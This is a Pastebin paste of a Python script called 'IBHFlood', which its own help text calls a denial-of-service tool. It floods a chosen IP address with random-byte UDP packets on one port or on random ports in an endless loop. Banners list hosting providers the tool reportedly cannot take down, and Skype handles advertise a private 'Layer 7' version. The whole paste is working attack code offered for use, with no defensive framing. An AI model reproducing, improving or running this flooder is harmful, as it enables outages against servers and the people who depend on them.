Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import threading
- import time
- import socket #Imports needed libraries
- import random
- import sys
- import os
- import argparse
- from random import randint
- from datetime import datetime
- #USAGE
- # python IBHFlood.py
- # -ip (IP) - Targets Address
- # -port (PORT) Usually Port 80
- # -size (Use 65500) Bytes per second.
- W = '\033[0m' # white (normal)
- R = '\033[31m' # red
- G = '\033[32m' # green
- O = '\033[33m' # orange
- B = '\033[34m' # blue
- P = '\033[35m' # purple
- C = '\033[36m' # cyan
- GR = '\033[37m' # gray
- T = '\033[93m' # tan
- rando = randint(1, 10)
- if rando == 1 or rando == 2 or rando == 3 or rando == 4 or rando == 5 or rando == 6 or rando == 7:
- title = "First"
- else:
- title = "Second"
- #print rando
- randy = randint(1, 20)
- if randy == 1:
- motd = "Made for a VPS... Don't be stupid with it."
- else:
- motd = "Coded in Python3."
- parser = argparse.ArgumentParser(description='IBHFlood: Denial of service tool. To maximize efficiency, it is recommended to run this from a VPS')
- parser.add_argument('-port', action="store",dest='port', type=int, required=False, help='Target Port(No argument means all ports)')
- parser.add_argument('-ip', action="store",dest='addr', required=False, help='Target Address')
- parser.add_argument('-size', action="store",dest='size', required=False, help='Packet size in bytes(No argument means 1024 bytes)')
- args = parser.parse_args()
- if title == "First":
- print(''+R+'')
- print('''
- ##################################
- # IBH PuTTy Python Flooder #
- # Scripted Using a DPHRAGM #
- # Socket (RAWUDP) #
- ##################################
- # This Can not down The following#
- # CloudFlare #
- # OVH #
- # BlazingFast #
- # Amazon Technologies #
- # Akamai Servers #
- # Payed for Google Plans #
- # NFO Servers #
- # ################################
- # If you find more hosts that #
- # This cannot Down, Notify me #
- # Skype #
- #________________________________#
- # dan.siebles.federal.agent #
- ##################################
- # Usage #
- #________________________________#
- # python IBHFlood.py #
- # -ip (IP) -p (PORT) -size (SIZE)#
- ##################################
- ''')
- print(''+W+'['+R+'!'+W+'] '+G+'Developed By: '+R+'dan.siebles.federal.agent'+G+'')
- print(''+W+'['+R+'!'+W+'] '+P+'' + motd + ''+G+'')
- print(''+W+'['+R+'!'+W+'] '+O+'AND...THEY\'RE GONE'+G+'')
- print(''+W+'['+R+'!'+W+'] '+G+'This was developed for use on a '+R+'VPS'+G+'')
- print(''+W+'['+R+'!'+W+'] '+G+'Follow '+R+'dan.siebles.federal.agent'+G+' on skype for other tools or if you liked this tool'+W+'')
- print(''+W+'['+R+'!'+W+'] '+O+'*Classy AF*'+W+'')
- elif title == "Second":
- print(''+R+'')
- print('''
- ##################################
- # IBH PuTTy Python Flooder #
- # Scripted Using a DPHRAGM #
- # Socket (RAWUDP) #
- ##################################
- # This Can not down The following#
- # CloudFlare #
- # OVH #
- # BlazingFast #
- # Amazon Technologies #
- # Akamai Servers #
- # Payed for Google Plans #
- # NFO Servers #
- # ################################
- # If you find more hosts that #
- # This cannot Down, Notify me #
- # Skype #
- #________________________________#
- # dan.siebles.federal.agent #
- ##################################
- # Usage #
- #________________________________#
- # python IBHFlood.py #
- # -ip (IP) -p (PORT) -size (SIZE)#
- ##################################
- ''')
- print(''+R+' Tool Made By: '+O+' TCP#IBH')
- sent=0
- sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) #Creates a socket
- if args.size:
- size = args.size
- bytes = random._urandom((int(args.size)-64)+64) #Creates packet
- else:
- size = 1024
- bytes=random._urandom((1024-64)+64) #Creates packet
- ip=args.addr
- #port=input('Port: ') #Port we direct to attack
- t1 = datetime.now()
- if args.port:
- port=args.port
- resp = (''+R+'port '+O+'' + str(args.port))
- # print ('['+R+'!'+W+'] Sending packets to '+R+'' + ip + ''+W+' : Stop with Ctrl+C')
- else:
- port=1
- resp = (''+O+'all '+R+'ports')
- if title == "First":
- print ('['+R+'!'+W+'] Sending packets to '+R+'' + ip + ''+W+' : Stop with Ctrl+C')
- else:
- print (''+R+'----------Sending '+O+'' + str(size) + ''+R+' byte packets to '+O+'' + args.addr + ''+R+' on '+O+'' + resp + ''+R+'----------'+W+'')
- print
- try:
- while 1: #Infinitely loops sending packets to the port until the program is exited.
- #print(bytes)
- if args.port:
- #print(port)
- port = args.port
- else:
- if port == 65535:
- port=1
- port = randint(1, 65500)
- #print (port)
- sock.sendto(bytes,(ip,port))
- #UNCOMMENT THE NEXT LINE FOR PYTHON2.*
- #print('['+G+'+'+W+'] Packets sent: ' + str(sent))
- #UNCOMMENT THE NEXT LINE FOR PYTHON3.*
- #print('['+G+'+'+W+'] Packets sent: ' + str(sent), end="\r")
- #print "Sent %s amount of packets to %s at port %s." % (sent,ip,port)
- sent= sent + 1
- #if args.port:
- # port=args.port
- #else:
- # port=port+1
- except KeyboardInterrupt:
- t2 = datetime.now()
- t3 = t2 - t1
- print('')
- if title == "First":
- print ('['+G+'+'+W+'] Sent '+G+'' + str(sent) + ''+W+' packets to '+R+'' + ip + ''+W+' in '+P+'' + str(t3) + ''+W+'')
- else:
- print (''+R+'----------Sent '+O+'' + str(sent) + ''+R+' packets to '+O+'' + ip + ''+R+' in '+O+'' + str(t3) + ''+R+'----------'+W+'')
- print
- print (motd)
- #Looking for the Private Version with Layer 7 Methods?
- #Add Me on skype! user.datagram.protocol
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement